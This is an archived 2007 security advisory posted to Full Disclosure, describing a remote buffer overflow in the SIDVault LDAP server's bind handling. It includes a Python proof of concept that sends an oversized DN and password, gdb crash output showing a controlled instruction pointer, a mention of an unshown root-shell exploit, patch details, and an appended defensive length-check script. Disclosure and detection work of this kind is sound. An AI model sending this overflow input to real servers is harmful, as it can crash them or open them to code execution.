Date: Sun, 26 Aug 2007 02:50:11 +0200
From: Joxean Koret <>
To: Full Disclosure <>,
	Security Tracker <>,
Subject: SIDVault LDAP Server Remote Buffer Overflow

SIDVault LDAP Server Remote Buffer Overflow

Product Description:

SIDVault LDAP Server for Win32 and GNU/Linux

SIDVault is a Simple Integration Database, allowing easy management and
installations with high performance LDAP v3 server. It supports any
number of schemas, easy to add/modify existing schemas, integrated web
based user access, and fast browser based administration tools. Supports
all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS. 

Vulnerable versions:

	Win32 2.0e
	Linux 2.0d

Vulnerability Details:

The login mechanism is prone to multiple buffer-overflow vulnerabilities
because it fails to adequately bounds-check user-supplied input before
copying it to an insufficiently sized buffer.

Successfully exploiting the issue will allow an attacker to execute
arbitrary code with root or SYSTEM-level privileges, depending on the
target operating system. Failed exploit attempts will result in a
denial-of-service condition.

Proof of concept:

# gdb /usr/local/sidvault/sidvault
(gdb) r -run

In another terminal:

$ cat
import ldap

l = ldap.open("localhost")
l.simple_bind("dc=" + "A"*4099, "B"*256)
$ ./

In the first terminal:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1226736720 (LWP 5942)]
0x41414141 in ?? ()
(gdb) where
#0  0x41414141 in ?? ()
#1  0x41414141 in ?? ()
(gdb) i r
eax            0x8202c48        136326216
ecx            0x0      0
edx            0xb6e164df       -1226742561
ebx            0x41414141       1094795585
esp            0xb6e16500       0xb6e16500
ebp            0x41414141       0x41414141
esi            0x41414141       1094795585
edi            0x41414141       1094795585
eip            0x41414141       0x41414141


An exploit for Debian-based distributions which spawns a remote root
terminal has been written. See the attached exploit.

Patch information:

The problem is solved in the latest version (2.0f) which is available in
the vendor's website at


Thanks to Lynden Sherriff from Alphacentauri Ltd., who was very kind
and professional.


The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind. 

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.


Joxean Koret - joxeankoret[at]yahoo[dot]es

View attachment "" of type "text/x-python" (1723 bytes)
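
Added example, not part of the original advisory or of the vendor's fix: a defender-side check that decodes an LDAP simple BindRequest and flags an oversized bind DN or password, the two fields the advisory's proof of concept inflates. The limits MAX_DN and MAX_PASSWORD and the names read_tlv and inspect_bind are assumptions made for this sketch.

```python
# Added example: flag LDAP BindRequests whose DN or simple password is oversized.
# MAX_DN and MAX_PASSWORD are assumed policy limits, not values from the advisory.
MAX_DN = 1024
MAX_PASSWORD = 128


def read_tlv(buf, pos):
    """Decode one BER TLV at pos; return (tag, value_start, value_end)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:                      # short-form length
        length = first
    else:                                 # long form: next n bytes hold the length
        n = first & 0x7F
        if n == 0 or n > 4 or pos + n > len(buf):
            raise ValueError("unsupported or truncated length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("value runs past end of buffer")
    return tag, pos, pos + length


def inspect_bind(msg):
    """Return findings for one LDAPMessage; [] if fine or not a BindRequest."""
    tag, start, _ = read_tlv(msg, 0)              # LDAPMessage SEQUENCE
    if tag != 0x30:
        raise ValueError("not a BER SEQUENCE")
    _, _, pos = read_tlv(msg, start)              # messageID INTEGER
    tag, pos, _ = read_tlv(msg, pos)              # protocolOp
    if tag != 0x60:                               # [APPLICATION 0] BindRequest
        return []
    _, _, pos = read_tlv(msg, pos)                # version INTEGER
    _, dn_s, dn_e = read_tlv(msg, pos)            # name (bind DN) OCTET STRING
    auth_tag, pw_s, pw_e = read_tlv(msg, dn_e)    # authentication choice
    findings = []
    if dn_e - dn_s > MAX_DN:
        findings.append(f"bind DN is {dn_e - dn_s} bytes (limit {MAX_DN})")
    if auth_tag == 0x80 and pw_e - pw_s > MAX_PASSWORD:   # [0] simple password
        findings.append(f"simple password is {pw_e - pw_s} bytes (limit {MAX_PASSWORD})")
    return findings


# Constructed sample: an ordinary bind as cn=admin with password "secret".
NORMAL_BIND = b"\x30\x1a\x02\x01\x01\x60\x15\x02\x01\x03\x04\x08cn=admin\x80\x06secret"
if __name__ == "__main__":
    print(inspect_bind(NORMAL_BIND))
```

The same length checks belong in the server before any copy into a fixed-size buffer; run on a proxy or sensor, they only cover cleartext LDAP traffic.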
